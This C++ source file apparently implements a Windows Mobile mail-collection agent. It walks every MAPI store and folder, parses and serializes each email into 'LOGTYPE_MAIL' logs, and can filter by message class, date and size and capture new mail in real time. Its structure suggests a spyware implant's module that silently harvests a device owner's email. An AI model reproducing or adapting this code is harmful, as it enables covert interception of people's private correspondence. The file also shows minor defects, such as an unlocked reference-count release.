#include <map>

#include "Conf.h"
#include "Log.h"
#include "MAPIAgent.h"

DWORD CollectorThreadProc(LPVOID lpParameter)
{
  (void) lpParameter;

  MAPIAgent* agent = MAPIAgent::Instance();
  agent->Collect(0);

  return 0;
}

class MAPIAgentCleaner
{

public:
  ~MAPIAgentCleaner()
  {
    MAPIAgent::Destroy();
  }
} MAPIAgentCleanerInstance;

MAPIAgent* MAPIAgent::_instance = 0;
int MAPIAgent::_refCount = 0;
volatile LONG MAPIAgent::_lLock = 0;

MAPIAgent::MAPIAgent(void)
: _conf(NULL), _mapi(NULL), _dwCollectorThreadID(0), _hCollectorThread(NULL), _HasToQuit(false)
{
}

MAPIAgent* MAPIAgent::Instance()
{
  while (::InterlockedExchange((LPLONG)&_lLock, 1) != 0)
    Sleep(1);

  if ( _instance == 0)
  {
    _instance = new MAPIAgent();
  }
  _refCount++;
  ::InterlockedExchange((LPLONG)&_lLock, 0);
  return _instance;
}

void MAPIAgent::Release()
{
  if ( --_refCount < 1)
  {
    Destroy();
    _instance = NULL;
  }
}

void MAPIAgent::Destroy()
{ 
  if ( _instance != 0 )
  {
    delete _instance;
    _instance = 0;
  }
}

HRESULT MAPIAgent::Run(DWORD nRun)
{
  (void) nRun;
  
  if (_conf->HasCollectConfig())
  {
    _hCollectorThread = CreateThread(NULL, 0, CollectorThreadProc, NULL, 0, &_dwCollectorThreadID);
    if (_hCollectorThread != INVALID_HANDLE_VALUE)
    {

	}
  }
  
  if (_conf->HasRealtimeConfig())
  {
    AdviseStores();
  }
  
  return S_OK;
}

HRESULT MAPIAgent::Collect(DWORD nRun)
{
  for(std::list<MAPIStorage*>::iterator store_iter = _mapi->stores.begin(); 
    store_iter != _mapi->stores.end(); store_iter++)
  {
    MAPIStorage* storage = *store_iter;

    HRESULT hr = storage->BuildFoldersTree();
    if (FAILED(hr))
    {
      continue;
    }
    
    /*
    std::map<int, LPTSTR> folder_names;
    TCHAR nRunPath[256] = {0};
    wsprintf(nRunPath, _T("%d"), nRun);
    
    folder_names[0] = nRunPath;
    folder_names[1] = storage->name();
    */

    for (tree<MAPIFolder*>::iterator folder_iter = storage->folders.begin();
      folder_iter != storage->folders.end(); folder_iter++)
    {
      // TCHAR lpPath[256] = {0};
      
      MAPIFolder* folder = *folder_iter;
      
      /*
      int folder_depth = storage->folders.depth(folder_iter) + 2; // account for storage name too
      folder_names[folder_depth] = folder->name();
      
      for (int i = 0; i <= folder_depth; i++)
      {
        TCHAR lpLocalPath[256] = {0};
        wsprintf(lpLocalPath, _T("\\%s"), folder_names[i]);
        StringCchCat(lpPath, sizeof(lpPath), lpLocalPath);
        
        // CreateDir ... REMOVE
        TCHAR lpwFolder[256] = {0};
        wsprintf(lpwFolder, _T("\\Storage Card\\%s"), lpPath);
        CreateDirectory(lpwFolder, NULL);
      }
      */
      
      LONG nMessages = folder->GetNumberOfMessages();
      
      if (nMessages > 0)
        if (SUCCEEDED(folder->Open()))
        {
          MAPIMessage* msg;
          ULONG nMsg = 1;
          
          while ((msg = folder->GetSingleMessage()) != NULL)
          {
            ASSERT(msg);

            msg->SetFolder(folder->name());
            if (msg->Parse() == S_OK)
            {
              DWORD cbSize = 0;
              
              LPBYTE lpData = msg->Serialize(&cbSize);
              if (lpData != NULL)
              {
                
                Log* pLog = new Log();
                if (pLog->CreateLog(LOGTYPE_MAIL, NULL, 0) == TRUE)
                {
                  pLog->WriteLog(lpData, cbSize);
                  pLog->CloseLog();
                }
                delete pLog;
                
                /*
                TCHAR lpFilepath[255] = {0};
                wsprintf(lpFilepath, _T("\\Storage Card\\%s\\%d.txt"), lpPath, cbSize);
                // wprintf(_T("\t\tDumping attachment to file \"%s\" [%d bytes]\r\n"), lpFilepath, cbBlobSize);
                DumpToFile(lpFilepath, lpData, cbSize);
                */
              }
              
              LocalFree(lpData);
            }
            
            delete msg;
            msg = NULL;
            
            nMsg++;

            if (IsQuitting())
              return S_OK;
            
            Sleep(20);
          }
        }
    }
  }

  return S_OK;
}

BOOL MAPIAgent::Init( LPBYTE lpConfig, DWORD cbConfig )
{
  BOOL bConfigSet = setConfiguration(lpConfig, cbConfig);
  if (bConfigSet == FALSE)
    return FALSE;
  
  _mapi = new MAPI();
  if (_mapi == NULL)
    return FALSE;
  
  if (S_OK != _mapi->Init())
    return FALSE;
  
  if (S_OK != _mapi->EnumerateStores())
    return FALSE;
  
  return TRUE;
}

BOOL MAPIAgent::Accept( MAPIMessage* msg, FilterTypes FilterType )
{
  ASSERT(msg);
  
  // Get filter for message ... if no filter is found, assume message class is not interesting
  MAPIAgentClassFilter* filter = IsMessageClassAcceptable(msg->Class(), FilterType);
  if (filter == NULL)
    return FALSE;
  
  // Check if we have to take all of them
  if (filter->header.All)
    return TRUE;
  
  // Check for filtering by date
  LPFILETIME lpftDeliveryTime = msg->DeliveryTime();
  if (lpftDeliveryTime)
  {
    // If Delivery time is equal or later than FromDate filter, accept message
    if (filter->header.DoFilterFromDate == TRUE)
      if ( CompareFileTime(lpftDeliveryTime, &filter->header.FromDate) < 0 )
        return FALSE;

    // If Delivery time is equal or earlier than ToDate filter, accept message
    if (filter->header.DoFilterToDate == TRUE)
      if ( CompareFileTime(lpftDeliveryTime, &filter->header.ToDate) > 0 )
        return FALSE;

  } else
#pragma message("WE DON'T TAKE MESSAGES WITHOUT DELIVERY DATE!!!!")
    return FALSE;
  
  // Check if we have to filter by message size
  if (filter->header.MaxMessageSize != FILTER_DONOTFILTERBYSIZE)
    if (filter->header.MaxMessageSize < msg->Size())
      return FALSE;
  
  return TRUE;
}

HRESULT MAPIAgent::AdviseStores()
{
  for(std::list<MAPIStorage*>::iterator store_iter = _mapi->stores.begin(); 
    store_iter != _mapi->stores.end(); store_iter++)
  {
    MAPIStorage* storage = *store_iter;
    AdviseStore(storage);
  }

  return S_OK;
}